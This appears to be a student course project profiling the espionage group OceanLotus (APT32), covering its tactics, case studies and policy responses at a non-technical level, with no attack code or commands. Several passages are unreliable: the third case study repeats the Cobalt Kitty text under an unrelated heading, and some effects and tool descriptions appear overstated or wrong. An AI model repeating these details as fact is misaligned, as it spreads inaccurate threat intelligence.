Peer reviewed Project on

OCEAN LOTUS
CYBER-THREAT ACTORS

Completed
by
John Sitima
In partial fulfilment of
Cybersecurity for Everyone

(C) 2024
johnsitima@gmail.com
 Cybersecurity.
Cybersecurity refers to the
practice of protecting internet-
connected systems, including
hardware, software, and data,
from attack, damage, or
unauthorized access

Threat actors
These are individuals or groups
who purposefully harm digital
devices or systems.

1
 Ocean Lotus
OceanLotus, also recognized as APT32, is a threat actor that emerged from
Vietnam in 2014. This group has focused on various sectors such as
manufacturing, network security, technology infrastructure, banking, media, and
consumer products.

They are also known by the following Aliases

also known as APT32, BISMUTH, Canvas
Cyclone or APT-C-00

Their Level of skill

Ocean Lotus has demonstrated a high level of technical sophistication and
operational competency. The group has shown the ability to conduct long-term
intrusion campaigns, maintain persistent access to targeted networks, and evade
detection by employing advanced obfuscation and anti-forensic techniques.

2
 capability and tactics used by ocean lotus cyber threat actors

The APT32 group has been known to employ a wide range of attack vectors and tools
to compromise its targets. These include spear-phishing emails, watering hole attacks,
social engineering techniques, and the use of custom malware. The group has been
observed using various malware families, such as Cobalt Strike, PlugX, and
PowerShell-based backdoors, to establish persistence on compromised systems and
exfiltrate sensitive data.

Targets of the Ocean Lotus

The group's activities have primarily targeted government organizations, foreign
corporations, dissidents, journalists, and other entities of interest to the Vietnamese
government.

The group has been linked to cyber attacks targeting dissidents and human rights
activists, indicating a broader agenda that includes monitoring and suppressing internal
dissent (amnesty 2021).

3
 Motivations of the Ocean Lotus

The motivations of the OCEANLOTUS threat actor are believed to be primarily related
to espionage and intelligence gathering. They have been known to target government
agencies, defense contractors, and. technology companies to steal sensitive
information that could be used for strategic or financial gain.

The targets of the Ocean Lotus group are generally foreign companies with sure success
and interests in Vietnam’s hospitality, manufacturing, and consumer goods sectors. As
well as the private sector, the Ocean Lotus group targets politicians and journalists
opposed to the Vietnamese government. (Brandefense 2022)

4
Ocean Lotus Geo-Political context
The cyberespionage group Ocean Lotus, active since 2014, targets organizations
in various industries in Vietnam and other Southeast Asian countries.

Insights on the Ocean Lotus modus operandi

The group has been known to employ a wide range of attack vectors and tools to
compromise its targets. These include spear-phishing emails, watering hole attacks,
social engineering techniques, and the use of custom malware.

The group has been observed using various malware families, such as Cobalt Strike,
PlugX, and PowerShell-based backdoors, to establish persistence on compromised
systems and exfiltrate sensitive data for ransom and corporate espionage.

5
 THE HACKING PROCESS
THE HACKING PROCESS

The Lockheed Martin Cyber Kill Chain (CKC)

This is a security defence model developed by Lockheed Martin in to identify

and stop sophisticated cyberattacks before they impact an organization. The
concept include the following steps:
i. Reconnaissance
ii. Weaponization
iii. Delivery
iv. Exploitation
v. Installation
vi. Command and Control
vii. Action on target.
(Source: lockeheedmartin.com 2012)

Based on the above, the researcher has created an acronym to easy

assimilation and conceptualization of the 7 steps of the CKC which is (Real,
Warriors, D, I,E, Commanding, Action on target)

The Ocean Lotus Group has utilised these steps in exploiting their numerous
targeted victims. 6
Tactics used by Ocean lotus actors on their targets.

The Ocean Lotus cyber actors groupemploy a diverse range of tactics,

techniques, and procedures (TTPs) to target and compromise their victims.
According to (Source: Kaspersky.com 2019) some of the key tactics used by
the group include:

1.. Spear-Phishing Attacks:

Ocean Lotus is known for conducting highly targeted spear-phishing campaigns,
often using socially engineered lures related to the victim's interests or industry.
The group leverages malicious attachments or links in the phishing emails to deliver
their custom malware payloads.

2. Watering Hole Attacks:

The group has been observed setting up malicious websites or compromising
legitimate websites frequented by their targets.
These watering hole attacks aim to infect visitors with malware when they access
the compromised web resources.

3. Social Engineering:
Ocean Lotus actors rely heavily on social engineering techniques to gather
information about their targets and gain their trust.

7
...Tactics used by Ocea lotus actors on their targets.(Continued)

4. Malware Deployment:
The group has been linked to the use of various custom-made malware families,
including Cobalt Strike, PlugX, and PowerShell-based backdoors.These malware
are designed to establish persistent access, exfiltrate data, and conduct further
reconnaissance on the compromised systems.

5. Exploitation of Vulnerabilities:
Ocean Lotus actors actively seek out and exploit vulnerabilities in popular
software, operating systems, and web applications to gain initial access to their
targets. They often leverage zero-day vulnerabilities to bypass security measures
and maintain a stealthy presence on the compromised systems.

6. Lateral Movement and Privilege Escalation:

Once inside the target network, the group employs techniques to move laterally
and escalate privileges, allowing them to access sensitive data and resources.
This includes the use of credential harvesting, privilege escalation exploits, and
tools like Mimikatz.

8
...Tactics used by Ocea lotus actors on their targets.(Continued)

7. Data Exfiltration:
The ultimate goal of Ocean Lotus's operations is to gather intelligence and
exfiltrate sensitive data from their targets.
The group has been observed using various techniques, such as encrypted data
transfers, to siphon off valuable information without raising suspicion.

8. Operational Security and Obfuscation:

To evade detection and maintain persistent access, Ocean Lotus actors employ
advanced obfuscation techniques, such as code encryption, anti-analysis
measures, and the use of legitimate network protocols for command-and-control
communications.

9
Cases studies of cyber attacks by Ocean Lotus Group and their
effects over the years.

Case 1: In 2017,
Ocean Lotus carried out a campaign against Vietnam's National Assembly. The
group sent spear phishing emails containing a link to a fake website that mimicked
the National Assembly's intranet login page. Victims who attempted to log in had
their credentials stolen by Ocean Lotus.

The Effects:
Primary effects:-
Defacement of website happened. The threat actors got credentials of the
Vietnam’s National Assembly members via the intranet. This target made the
intranet to be inoperable for some time.

Secondary effects:-
The attack disrupted the functioning of the intranet resulting in secondary effects
of ineffective functioning of the Vietnam’s National Assembly) in their
Government duties.

Second order effects:-

Data integrity ans exposure of confidential parliament details its structures and
leadership exposed by this threat action resulted in general people fearing of
privacy of their own data and privacy.
10
Cases studies of cyber attacks by Ocean Lotus Group and their effects
over the years... Continued

Case 2: Operation Cobalt Kitty 20... (Source : Cyberreason.com 2019)

Operation Cobalt Kitty, Ocean Lotus group targeted global corporations based in
Asia with the goal of stealing proprietary business information. The threat actor
targeted the company’s top-level management by using spear-phishing attacks as
the initial penetration vector.

The Effects: Primary effects:-

The attack directly compromised more than 40 PCs and servers, including the
domain controller, file servers, Web application server and database server making
them inoperable for a time.

Secondary effects:-
The attack disrupted the functioning of the the companies resulting in secondary
effects of loss of revenue and income.

Second order effects:-

Data integrity and exposure of confidential corporate private and secret data were
some of the most serious second order effects of the attack..

11
Cases studies of cyber attacks by Ocean Lotus Group and their effects
over the years... Continued

Case 3: 2014 Action on US-based NGO Electronic Frontier Foundation (EFF)

the Associated Press international news organization and two Vietnamese activists.
(Source : Amnesty.org 2021)

Operation Cobalt Kitty, Ocean Lotus group targeted global corporations based in
Asia with the goal of stealing proprietary business information. The threat actor
targeted the company’s top-level management by using spear-phishing attacks as
the initial penetration vector.

The Effects: Primary effects:-

The attack directly compromised more than 40 PCs and servers, including the
domain controller, file servers, Web application server and database server making
them inoperable for a time.

Secondary effects:-
The attack disrupted the functioning of the the companies resulting in secondary
effects of loss of revenue and income.

Second order effects:-

Data integrity and exposure of confidential corporate private and secret data were
some of the most serious second order effects of the attack..
12
Cases studies of cyber attacks by Ocean Lotus Group and their effects over
the years... Continued

Case 4: 2020 A report by Bloomberg highlighted that as back as 06 January 2020 in

the midst of the corona virus pandemic cyber attacks by Ocean Lotus were going on,
targeting the Chinese Government and continued through April, a senior manager for
cyber-espionage at Fire Eye Inc and officials in the Chinese Government threat
intelligence unit were quoted saying. (Source : Bloomberg.com 2020)

The OceanLotus used spear-phishing and malware fit modus operandi to target China's
Ministry of Emergency Management and the Wuhan municipal government in order to
obtain information about the COVID-19 pandemic. The
Vietnamese Ministry of Foreign Affairs denied the accusations.
The Effects: Primary effects:-
The attack directly compromised workstations and file servers, Web application server
and database server used in the collecting an collating of Covid-19 data making them
inoperable for a time.

Secondary effects:-
The attack disrupted the real-time transmission of Covid-19 stats and data to numerous
stakeholders who needed it for decision making.

Second order effects:-

Data integrity and exposure of confidential private patients data, delays in medical
supplies and PPEs to frontline workers were some of the most serious second order
effects of the attack..
13
Characteristics of Oceanlotus cyber threat actors

1. Advanced and Persistent:

Ocean Lotus is an advanced persistent threat (APT) group, demonstrating a high level
of technical sophistication and the ability to conduct long-term, targeted intrusion
campaigns.
The group has maintained a persistent presence in the networks of their targets, often
establishing a stealthy foothold to conduct ongoing espionage activities.

2. Politically Motivated:
The primary objective of Ocean Lotus appears to be cyber espionage, with a focus on
gathering intelligence for political, economic, and strategic purposes.
The group's targets have primarily included government organizations, foreign
corporations, dissidents, and other entities of interest to the Vietnamese government,
suggesting a state-sponsored or state-aligned nature.

3. Adaptable and Innovative:

Ocean Lotus has shown a remarkable ability to adapt and evolve its tactics, techniques,
and procedures (TTPs) over time.
The group has demonstrated a willingness to leverage the latest technologies, exploit
zero-day vulnerabilities, and develop custom malware to maintain an edge over its
targets and evade detection.

14
Characteristi cs of Oceanlotus cyber threat actors....Continued.

4. Operationally Sophisticated:
The Ocean Lotus actors have exhibited a high level of operational security, employing
advanced obfuscation techniques, utilizing legitimate network protocols for command-
and-control, and maintaining a low profile to avoid detection.
Their ability to conduct successful spear-phishing campaigns, watering hole attacks,
and lateral movement within compromised networks underscores their operational
sophistication.

5. Geographically Focused:
The group's activities have primarily targeted organizations and individuals in Southeast
Asian countries, particularly Vietnam, Laos, Cambodia, and the Philippines.
This regional focus suggests a strong alignment with the interests and objectives of the
Vietnamese government or state-affiliated entities. (Source: Bloomberg.com 2021)

6. Potentially State-Sponsored:
While definitive attribution is challenging in the cyber domain, various cybersecurity
firms and government agencies have attributed the Ocean Lotus activities to threat
actors originating from Vietnam.
The group's consistent focus on intelligence gathering and the alignment of its targets
with Vietnamese interests suggest potential state sponsorship or support.(Source:
Bloomberg.com 2021)

15
 Oceanlotus cyber threat actors, a private problem for business or a public
concern for Policy maker?

Private Sector Concerns:

• Businesses, particularly those operating in Southeast Asia or with interests in the

region, are prime targets for Ocean Lotus's cyber espionage activities.
• The group's focus on gathering intelligence and stealing sensitive data poses
significant risks to private companies, as it can lead to the loss of trade secrets,
intellectual property, and other valuable information.
• Compromised businesses may suffer financial losses, reputational damage, and
disruptions to their operations, making Ocean Lotus a critical private sector
problem.
• Private companies need to prioritize robust cybersecurity measures, incident
response plans, and collaboration with security vendors and law enforcement to
mitigate the risks posed by Ocean Lotus.

Public Policy Concerns:

• Ocean Lotus's suspected state-sponsored or state-aligned nature makes it a

matter of national security and public policy concern.
• The group's targeting of government agencies, critical infrastructure, and other
entities of strategic importance raises concerns about national sovereignty,
geopolitical tensions, and the potential for cascading impacts on the public
sector.

16
 Possible responses by Policy makers to Oceanlotus cyber threat actors,

• Policymakers need to address the threat of Ocean Lotus through the

development of comprehensive national cybersecurity strategies, international
cooperation, and the strengthening of defensive capabilities
.
• Policies related to information sharing, threat intelligence exchange, and
coordinated response mechanisms between the public and private sectors are
crucial in mitigating the risks posed by Ocean Lotus.

• Diplomatic efforts and sanctions may also be considered as part of a broader

strategy to deter and disrupt the activities of state-sponsored cyber threat actors
like Ocean Lotus.

Conclusion
Overall, the Ocean Lotus cyber threat actors represent a sophisticated, persistent,
and politically motivated group that poses a significant risk to organizations and
individuals in the Southeast Asian region. Their continuous evolution and
adaptability underscore the need for robust cybersecurity measures and
international cooperation to identify and mitigate the threats posed by such
advanced persistent threat groups.

17
 REFERENCES
1.https://cdn.amnesty.at/media/11606/amnesty-report_caught-in-the-net_the-global-thre
at-from-eu-regulated-spyware_oktober-2023.pdf
(accessed on 07/03/2024)
2.
https://css.ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/
pdfs/Cyber-Reports-2018-05.pdf
3. https://www.cybereason.com/blog/operation-cobalt-kitty-apt (accessed on
01/06/2024)
4. https://www.cfr.org/cyber-operations/export-incidents (accessed on05/04/2024)

5.
https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-r
etrospect/yir-cyber-threats-report-download.pdf
(accessed on 11/04/2024)
6.
https://ics-cert.kaspersky.com/publications/reports/2020/04/24/threat-landscape-for-indust
rial-automation-systems-apt-attacks-on-industrial-companies-in-2019/
accessed
7. on (11/04/2024)
https://www.bloomberg.com/news/articles/2020-04-23/vietnamese-hackers-
targeted-china-officials-at-heart-of-outbreak(accessed on 03/06/2024)

8. https://brandefense.io/blog/apt-groups/ocean-lotus-apt-group/#:~(accessed on
13/04/2024)
9.
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/G
aining_the_Advantage_Cyber_Kill_Chain.pdf 18